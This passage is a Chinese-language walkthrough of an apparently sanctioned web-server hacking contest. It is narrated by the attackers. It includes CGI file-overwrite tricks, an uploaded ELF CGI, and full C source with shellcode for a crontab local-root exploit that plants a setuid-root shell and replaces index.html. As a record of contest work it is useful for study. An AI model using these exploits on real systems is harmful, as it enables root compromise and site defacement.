怎么办？rename()函数需要两个路径参数，一个是新的，一个是旧的……等等，这个函数没有错误检验，所以如果它出错的话，程序就会跳过去，我们怎样能使它出错呢？用一个非法的文件名。Linux系统缺省的最长的文件名的限制是1024（MAX_PATH_LEN），所以如果我们能让这个脚本把我们的文件重命名成一个比1024字节长的文件的话就行了。
下一步我们将提交一个大约1024字节的广告编号（AD number）。

现在，脚本没有如设想的运行，因为他只允许我们上传存在的广告编号的图片。
（做那个10^1024的数字花了我们不少的时间。）
又是一个死胡同？
没有，那个不完善的输入检测函数让我们有机会进一步的改进这个数字。简单的浏览一下edit.cgi这个脚本，想一想，如果你输入一个名字然后是回车，最后是那1024个数字，会发生什么？哈哈，有了。

那个long.adnum文件让我们有机会建立一个新的广告。

当我们可以骗过了广告编号检查后，我们可以利用脚本办到以下的事情：

建立/改写任何nobody有权限的文件，并且可以使该文件是我们希望的内容（除了为GIF留的有NUL的文件头）。
好，让我们试试。
确认脚本overwrite.as.nobody允许我们得到以上的权限。
直到目前为止一切良好，我们调整脚本以便改写index.html……但是没成功。
可能是我们没有权限改该文件（可能因为文件的所有者是root，或者文件没设置写权限）。怎么办？我们另寻出路吧。
我们试着改写一个CGI，看看我们能否让它为我们工作。这样我们就可以寻找“绝密”文件了，那就胜利在望了。

我们修改了overwrite脚本，很好，他允许我们改写CGI！
我们决定不修改那些重要的（相对严谨）的CGI，我们选择了advisory.cgi（管它是干什么的呢？）。

这样我们就可以上传一个能允许我们执行命令的shell脚本了，太好了……
但是，当你以CGI的形式运行shell脚本的时候，你得在脚本的第一行对此加以说，就象下面这样：
#!/bin/sh
echo "Content-type: text/html"
find / "*secret*" -print

但是，别忘了，我们的第6、7、8、9字节必须是0或者一个很小的值，以适应有关图形大小的规定……
#!/bi\00\00\00\00n/sh

这样是不行的，内核只读了前5字节，然后就试图去执行“#!/bi”……就我所知，还没有我们可以运行的3个字节（外加#!两个字节）的shell。又是死胡同……
一个ELF（linux的缺省的可执行文件的格式）文件给了我们答案，结果我们成功的将那几个字节置成了0x00，太妙了。

现在我们需要将一个ELF可执行文件放到远端的服务器上。我们必须使它符合URL的标准，因为我们只可以用GET的方法，不能用POST，这样我们至少要符合最长URI的限制。对于Apache服务器最长的URI为8190字节，别忘了我们还要用一个很大的1024个字符的数字，所以给我们的符合URL标准的ELF程序留下的空间只有7000字节了。

它只能是个小程序了。
lemming:~/pcweek/hack/POST# cat fin.c#includemain()
{printf("Content-type: text/html\n\n\r");
fflush(stdout);execlp("/usr/bin/find","find","/",0);}

编译后如下：
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

然后让它符合URL的标准：
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
要在我们的脚本中使用的话，它是过大了。

我们只有靠我们的直觉来手工编辑这个二进制文件了，我们决定将这个可执行文件中“GCC”字符串后的所有内容都删除。这么做几乎没有任何理论的根据，如果要根据的话就得研究ELF规范了，但是这么做似乎还可以：
lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#

现在，我们合并我们的工作成果，然后运行……
我们查看在我们目录中的名为get、sec、find的文件，希望获得更多的信息。
在这里你会找到to_url 脚本，和一些简单的C文件，这些东西和URL一起解析，就大功告成了。

现在我们上载这个CGI，然后用我们喜欢的浏览器访问它：
http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi>http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi ;

这样我们对服务器上的/ 进行了全面的查找。
但是他们的“绝密”文件没在那，或者以nobody的身份无法访问。
我们尝试了一些命令组合，如locate、ls和一些其他命令，但无济于事。
如果这个文件存在，那么它究竟在哪。

现在问题严重了，必须要root的权限了。正象我的一位朋友说的那样，有现成的为什么不用呢？所以，根据我们知道的有关那台服务器的情况（Linux，i386，因为我机器就是i386，并且我的那个ELF文件已经在它上面运行了）。我们查找了软件更新的数据，发现了一个对所有版本的RedHat都可以利用的crontab漏洞
（译者注：细节将在后面讨论）。
你可以在最近的 bugtraq/securityfocus 中找到。太好了，我们根据我们的需要对其加以修改，显然我们根本不需要一个交互的根用户shell，我们只要做一个nobody可访问的suidroo
t的shell就行了：
#include
#include
#include
#include
#include
char shellcode[] =
"\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
"\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
"\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
"\xff/tmp/w00w00";int main(int argc,char *argv[])
{FILE *cfile,*tmpfile;
struct stat sbuf;int x;chdir("/tmp");cfile = fopen("/tmp/cronny","a+");
tmpfile = fopen("/tmp/w00w00","a+"); // ,S_IXUSR|S_IXGRP|S_IXOTH);
fprintf(cfile,"MAILTO=");for(x=0;x<96;x++)
fprintf(cfile,"w00w00 ");fprintf(cfile,"%s",shellcode);
fprintf(cfile,"\n* * * * * date\n");fflush(cfile);
fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash /tmp/.bs\nchmod 4755 /tmp/.bs\n");fflush(tmpfile);fclose(cfile),fclose(tmpfile);
chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
execl("/usr/bin/crontab","crontab","/tmp/cronny",(char *)0);}

经我们修改后，使这个shell指向了/tmp/.bs。我们重新上载CGI，并且用我们的浏览器使其运行，然后我们就准备进行测试了。
我们做了一个CGI进行初次测试，它将执行ls /tmp。我们确实实现了suidroot。
( ... )
execlp("/bin/ls","ls","-ula","/tmp",0);
( ... )

我们接着将一个用来替换index.html的文件上载到了/tmp/xx。
( ... )
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
( ... )

应该做最后要运行的程序了：
( ... )
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
( ... )

游戏到此结束了。
共耗时20小时。
最后我们将我们的资料上载并拷贝到了一个安全并且nobody可见的地方，然后向讨论组发了一个消息并且开始等待回音了。

文章转载地址：http://www.cnpaf.net/Class/hack/05121820345081323530.htm